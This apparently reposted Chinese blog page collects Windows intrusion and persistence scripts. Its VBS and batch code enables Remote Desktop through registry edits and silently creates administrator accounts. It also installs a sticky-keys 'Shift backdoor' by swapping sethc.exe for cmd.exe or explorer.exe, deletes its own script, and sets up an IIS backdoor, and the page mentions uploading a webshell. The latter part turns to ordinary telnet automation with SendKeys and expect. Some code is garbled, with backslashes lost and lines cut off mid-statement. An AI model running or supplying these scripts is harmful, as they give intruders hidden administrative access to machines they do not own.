vbs远程木马_vbs 访问webservice

2022-09-29 11:36:04 浏览数 (1)

大家好,又见面了,我是你们的朋友全栈君。 xp、2003开3389 非net创建管理用户 Shift后门 自删除脚本 提权VBS 整理收集 2010年12月07日   xp、2003开3389 非net创建管理用户 Shift后门 自删除脚本   vbson error resume next   const HKEY_LOCAL_MACHINE = &H80000002   strComputer = “.”   Set StdOut = WScript.StdOut   Set oReg=GetObject(“winmgmts:{impersonationLevel=impersonate}!\” &_   strComputer & “rootdefault:StdRegProv”)   strKeyPath = “SYSTEMCurrentControlSetControlTerminal Server”   oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath   strKeyPath = “SYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp”   oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath   strKeyPath = “SYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp”   strKeyPath = “SYSTEMCurrentControlSetControlTerminal Server”   strValueName = “fDenyTSConnections”   dwValue = 0   oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue   strKeyPath = “SYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp”   strValueName = “PortNumber”   dwValue = 3389   oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue   strKeyPath = “SYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp”   strValueName = “PortNumber”   dwValue = 3389   oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue   on error resume next   dim username,password:If Wscript.Arguments.Count Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username=”HackEr”:password=”393214425″:end if:set wsnetwork=CreateObject(“WSCRIPT.NETWORK”):os=”WinNT://”&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os&”/Administrators,group”):Set od=ob.Create(“user”,username):od.SetPassword password:od.SetInfo:Set of=GetObject(os&”/”&username&”,user”):oe.Add(of.ADsPath)’wscript.echo of.ADsPath   On Error Resume Next   Dim obj, success   Set obj = CreateObject(“WScript.Shell”)   success = obj.run(“cmd /c takeown /f %SystemRoot%system32sethc.exe&echo y| cacls %SystemRoot%system32sethc.exe /G %USERNAME%:F© %SystemRoot%system32cmd.exe %SystemRoot%system32acmd.exe© %SystemRoot%system32sethc.exe %SystemRoot%system32asethc.exe&del %SystemRoot%system32sethc.exe&ren %SystemRoot%system32acmd.exe sethc.exe”, 0, True)   CreateObject(“Scripting.FileSystemObject”).DeleteFile(WScript.ScriptName)   加用户   ——————————–   echo Windows Registry Editor Version 5.00>>3389.reg   echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]>>3389.regecho “fDenyTSConnections”=dword:00000000>>3389.reg   echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp]>>3389.reg   echo “PortNumber”=dword:00000d3d>>3389.reg   echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp]>>3389.reg   echo “PortNumber”=dword:00000d3d>>3389.reg   regedit /s 3389.reg   del 3389.reg   ————————————————-   vbs加用户精简版   set w=createobject(“wscript.shell”):w.run “net user hack echoeye /add”,0:w.run “net localgroup administrators hack /add”,0   —————————————————–   cmd.asp webshell 上传   —————————————————

          ——————————————————————–  Shift后门  —————————————–  @echo off  cls  echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  echo.  echo Shift后门 By:Hack残少 QQ:297248524  echo.  echo 使用方法:本文件执行完毕后,  echo 在终端界面按Shift 5次即可登陆系统!  echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  echo.  copy c:windowsexplorer.exe c:windowssystem32sethc.exe  echo 完成百分之 50  copy c:windowssystem32sethc.exe c:windowssystem32dllcachesethc.exe  echo 完成百分之 80  attrib c:windowssystem32sethc.exe h  echo 完成百分之 90  attrib c:windowssystem32dllcachesethc.exe h  echo 完成百分之 100  cls  echo.  echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  echo 后门安装完毕!  echo.  echo 感谢您使用Shift后门  echo.  echo By:Hack残少 QQ:297248524  echo.  echo http://www.shenmicaobi.com/  echo.  echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  echo.  echo. & pause  exit  ————————————————————–  不依靠CMD添加用户的VBS代码  set wsnetwork=CreateObject(“WSCRIPT.NETWORK”)  os=”WinNT://”&wsnetwork.ComputerName  Set ob=GetObject(os) ‘得到adsi接口,绑定  Set oe=GetObject(os&”/Administrators,group”) ‘属性,admin组  Set od=ob.Create(“user”,”test”) ‘建立用户  od.SetPassword “1234” ‘设置密码  od.SetInfo ‘保存  Set of=GetObject(os&”/test”,user) ‘得到用户  oe.add os&”/test”  ——————————————  用vbs实现本地添加用户的脚本  Dim WshShell  set WshShell = CreateObject(“wscript.Shell”)  WshShell.Run “cmd /k”  for i = 1 to 3  WScript.Sleep 500  WshShell.SendKeys “net user admin” & i & ” abcd@123 /add”  WshShell.SendKeys “{ENTER}”  next  WshShell.SendKeys “exit”  WshShell.SendKeys “{ENTER}”  ———————————————  上帝之门 执行成功 3389 管理员帐号任意密码登入 保存为.exe  ————————  MZ  ————————  IIs后门  ——————-  help1=”IIS后门设置器 黑猫专用版”  help2=”请输入正确的虚拟目录名称和映射的路径,格式如下”  help3=” cscript.exe iis.vbs 虚拟目录的名称 映射的路径”  help4=”例如: cscript.exe iis.vbs lh e:”  set Args = Wscript.Arguments  if args.count telnet_tmp.vbs  echo WScript.Sleep 300 >>telnet_tmp.vbs  echo sh.SendKeys “open 192.168.1.200” >>telnet_tmp.vbs  echo WScript.Sleep 300 >>telnet_tmp.vbs  echo sh.SendKeys “{ENTER}” >>telnet_tmp.vbs  echo WScript.Sleep 300 >>telnet_tmp.vbs  echo sh.SendKeys “engineer{ENTER}” >>telnet_tmp.vbs  echo WScript.Sleep 300 >>telnet_tmp.vbs  echo sh.SendKeys “ls {ENTER}”>>telnet_tmp.vbs  start telnet  cscript //nologo telnet_tmp.vbs  del telnet_tmp.vbs  附录:  对于SendKeys这个命令可以send什么,我们可以看下面的列表:  BACKSPACE {BACKSPACE}, {BS}, or {BKSP}  BREAK {BREAK}  CAPS LOCK {CAPSLOCK}  DEL or DELETE {DELETE} or {DEL}  DOWN ARROW {DOWN}  END {END}  ENTER {ENTER}or ~  ESC {ESC}  HELP {HELP}  HOME {HOME}  INS or INSERT {INSERT} or {INS}  LEFT ARROW {LEFT}  NUM LOCK {NUMLOCK}  PAGE DOWN {PGDN}  PAGE UP {PGUP}  PRINT SCREEN {PRTSC}  RIGHT ARROW {RIGHT}  SCROLL LOCK {SCROLLLOCK}  TAB {TAB}  UP ARROW {UP}  F1 {F1}  F2 {F2}  F3 {F3}  F4 {F4}  F5 {F5}  F6 {F6}  F7 {F7}  F8 {F8}  F9 {F9}  F10 {F10}  F11 {F11}  F12 {F12}  F13 {F13}  F14 {F14}  F15 {F15}  F16 {F16}  SHIFT   CTRL ^  ALT %  二。Linux平台  保证你的系统上存在expect这个可执行程序,保存以下代码到文件autoTelnet,并给与执行权限。详细操作察看命令expect  #!/usr/bin/expect —  set SERVER “192.168.1”  set USER “myusername”  set PASSWD “mypass”  if { argv  } else {  spawn telnet SERVER.200  }  expect “Password:”  send “

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/193554.html原文链接:https://javaforall.cn

0 人点赞